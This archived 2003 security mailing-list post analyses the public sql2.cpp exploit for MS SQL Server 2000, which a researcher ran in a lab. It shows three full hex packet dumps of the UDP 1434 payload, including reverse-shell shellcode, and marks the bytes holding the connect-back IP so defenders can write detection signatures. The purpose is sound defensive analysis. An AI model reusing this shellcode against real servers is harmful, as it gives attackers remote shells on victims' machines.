All,
I have been working on my GCIA paper and was using the original sql2.cpp posted
on packetstormsecurity.org. So, as you can imagine, I nearly fell off my chair
when sqlslammer hit. I know that there have been traces posted of Dave
Litchfield's code posted to this board (modified by cnhonker) but I wanted to
throw this information out there and I hope it helps.
When I compiled the original code using LCC and ran it against a vulnerable SQL
2k database, I found that the source port used was 53 as you can see in the
traces below. I don't know if it's b/c of the compiler that I used that caused
this to use the source port of 53 or what - anyone with ideas on that I'd
appreciate it.
The exploit posted on packetstormsecurity.org gave a remote command shell to
the attacker (much nastier than sqlslammer). The attacker could specify the
port and the IP address at the command line for the victim machine to connect
back to. This allowed for the UDP packet to be spoofed but still provide a
specific target for the victim to connect back to. I was interested in finding
the exact place in the payload that gives the IP address that the attacker
wishes the victim to connect back to. I’ve included traces below with
different addresses specified at the command line. The sections of the dump
marked below correlate to the IP I gave at the command line. This should help
anyone who saw this signature (not the slammer sig) to identify if any of their
systems are communicating back to an attacker.
Targeted to return to 192.168.1.10 = 0xc0A8010A
01:25:03.738897 192.168.1.10.53 > 192.168.1.7.1434: [udp sum ok] 1089 op8+
[b2&3=0x4141] [16962a] [16706q] [16963n] [17219a
u][|domain] (ttl 128, id 17335, len 514)
4500 0202 43b7 0000 8011 71d2 c0a8 010a
c0a8 0107 0035 059a 01ee aecf 0441 4141
4142 4242 4243 4343 4344 4444 4445 4545
4546 4646 4647 4747 4748 4848 4849 4949
494a 4a4a 4a4b 4b4b 4b4c 4c4c 4c4d 4d4d
4d4e 4e4e 4e4f 4f4f 4f50 5050 5051 5151
5152 5252 5253 5353 5354 5454 5455 5555
5556 5656 5657 5757 5758 5858 58dc c9b0
42eb 0e41 4243 4445 4601 70ae 4201 70ae
4290 9090 9090 9090 9055 8bec 6818 10ae
4268 1010 ae42 eb03 5beb 05e8 f8ff ffff
beff ffff ff81 f6ae feff ff03 de90 9090
9090 33c9 b144 b258 3013 83eb 01e2 f943
538b 75fc ff16 5033 c0b0 0c03 d853 ff16
5033 c0b0 1003 d853 8b45 f450 8b75 f8ff
1650 33c0 b00c 03d8 538b 45f4 50ff 1650
33c0 b008 03d8 538b 45f0 50ff 1650 33c0
b010 03d8 5333 c033 c966 b904 0150 e2fd
------------------------------------------------------------------
------------next line contains the IP to connect back to----------
8945 dc89 45d8 bfc0 a801 0a89 7dd4 4040
------------------------------------------------------------------
8945 d066 b8ff ff66 35ff ca66 8945 d26a
016a 028b 75ec ffd6 8945 ec6a 108d 75d0
568b 5dec 538b 45e8 ffd0 83c0 4489 8558
ffff ff83 c05e 83c0 5e89 4584 895d 9089
5d94 895d 988d bd48 ffff ff57 8dbd 58ff
ffff 5733 c050 5050 83c0 0150 83e8 0150
508b 5de0 5350 8b45 e4ff d033 c050 c604
2461 c644 2401 6468 5468 7265 6845 7869
7454 8b45 f050 8b45 f8ff 10ff d090 2f2b
6a07 6b6a 763c 3434 5858 333d 2a36 3d34
6b6a 763c 3434 5858 5858 0f0b 190b 373b
333d 2c19 5858 3b37 3636 3d3b 2c58 1b2a
3d39 2c3d 082a 373b 3d2b 2b19 5858 3b35
3c58 7d25 4ab8
Targeted to return to 192.168.1.50 = 0xc0A80132
01:26:19.634550 192.168.1.10.53 > 192.168.1.7.1434: [udp sum ok] 1089 op8+
[b2&3=0x4141] [16962a] [16706q] [16963n] [17219a
u][|domain] (ttl 128, id 17577, len 514)
4500 0202 44a9 0000 8011 70e0 c0a8 010a
c0a8 0107 0035 059a 01ee 86cf 0441 4141
4142 4242 4243 4343 4344 4444 4445 4545
4546 4646 4647 4747 4748 4848 4849 4949
494a 4a4a 4a4b 4b4b 4b4c 4c4c 4c4d 4d4d
4d4e 4e4e 4e4f 4f4f 4f50 5050 5051 5151
5152 5252 5253 5353 5354 5454 5455 5555
5556 5656 5657 5757 5758 5858 58dc c9b0
42eb 0e41 4243 4445 4601 70ae 4201 70ae
4290 9090 9090 9090 9055 8bec 6818 10ae
4268 1010 ae42 eb03 5beb 05e8 f8ff ffff
beff ffff ff81 f6ae feff ff03 de90 9090
9090 33c9 b144 b258 3013 83eb 01e2 f943
538b 75fc ff16 5033 c0b0 0c03 d853 ff16
5033 c0b0 1003 d853 8b45 f450 8b75 f8ff
1650 33c0 b00c 03d8 538b 45f4 50ff 1650
33c0 b008 03d8 538b 45f0 50ff 1650 33c0
b010 03d8 5333 c033 c966 b904 0150 e2fd
------------------------------------------------------------------
------------next line contains the IP to connect back to----------
8945 dc89 45d8 bfc0 a801 3289 7dd4 4040
------------------------------------------------------------------
8945 d066 b8ff ff66 35ff ca66 8945 d26a
016a 028b 75ec ffd6 8945 ec6a 108d 75d0
568b 5dec 538b 45e8 ffd0 83c0 4489 8558
ffff ff83 c05e 83c0 5e89 4584 895d 9089
5d94 895d 988d bd48 ffff ff57 8dbd 58ff
ffff 5733 c050 5050 83c0 0150 83e8 0150
508b 5de0 5350 8b45 e4ff d033 c050 c604
2461 c644 2401 6468 5468 7265 6845 7869
7454 8b45 f050 8b45 f8ff 10ff d090 2f2b
6a07 6b6a 763c 3434 5858 333d 2a36 3d34
6b6a 763c 3434 5858 5858 0f0b 190b 373b
333d 2c19 5858 3b37 3636 3d3b 2c58 1b2a
3d39 2c3d 082a 373b 3d2b 2b19 5858 3b35
3c58 da57 f90d
Targeted to return to 192.168.1.100 = 0xc0A80164
01:27:11.975255 192.168.1.10.53 > 192.168.1.7.1434: [udp sum ok] 1089 op8+
[b2&3=0x4141] [16962a] [16706q] [16963n] [17219a
u][|domain] (ttl 128, id 17746, len 514)
4500 0202 4552 0000 8011 7037 c0a8 010a
c0a8 0107 0035 059a 01ee 54cf 0441 4141
4142 4242 4243 4343 4344 4444 4445 4545
4546 4646 4647 4747 4748 4848 4849 4949
494a 4a4a 4a4b 4b4b 4b4c 4c4c 4c4d 4d4d
4d4e 4e4e 4e4f 4f4f 4f50 5050 5051 5151
5152 5252 5253 5353 5354 5454 5455 5555
5556 5656 5657 5757 5758 5858 58dc c9b0
42eb 0e41 4243 4445 4601 70ae 4201 70ae
4290 9090 9090 9090 9055 8bec 6818 10ae
4268 1010 ae42 eb03 5beb 05e8 f8ff ffff
beff ffff ff81 f6ae feff ff03 de90 9090
9090 33c9 b144 b258 3013 83eb 01e2 f943
538b 75fc ff16 5033 c0b0 0c03 d853 ff16
5033 c0b0 1003 d853 8b45 f450 8b75 f8ff
1650 33c0 b00c 03d8 538b 45f4 50ff 1650
33c0 b008 03d8 538b 45f0 50ff 1650 33c0
b010 03d8 5333 c033 c966 b904 0150 e2fd
------------------------------------------------------------------
------------next line contains the IP to connect back to----------
8945 dc89 45d8 bfc0 a801 6489 7dd4 4040
------------------------------------------------------------------
8945 d066 b8ff ff66 35ff ca66 8945 d26a
016a 028b 75ec ffd6 8945 ec6a 108d 75d0
568b 5dec 538b 45e8 ffd0 83c0 4489 8558
ffff ff83 c05e 83c0 5e89 4584 895d 9089
5d94 895d 988d bd48 ffff ff57 8dbd 58ff
ffff 5733 c050 5050 83c0 0150 83e8 0150
508b 5de0 5350 8b45 e4ff d033 c050 c604
2461 c644 2401 6468 5468 7265 6845 7869
7454 8b45 f050 8b45 f8ff 10ff d090 2f2b
6a07 6b6a 763c 3434 5858 333d 2a36 3d34
6b6a 763c 3434 5858 5858 0f0b 190b 373b
333d 2c19 5858 3b37 3636 3d3b 2c58 1b2a
3d39 2c3d 082a 373b 3d2b 2b19 5858 3b35
3c58 c7a1 3e2a
Anyone wanting the bpf traces, send me an email directly and
I'll send them along.
Regards,
Jim
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed Jan 29 2003 - 08:32:51 PST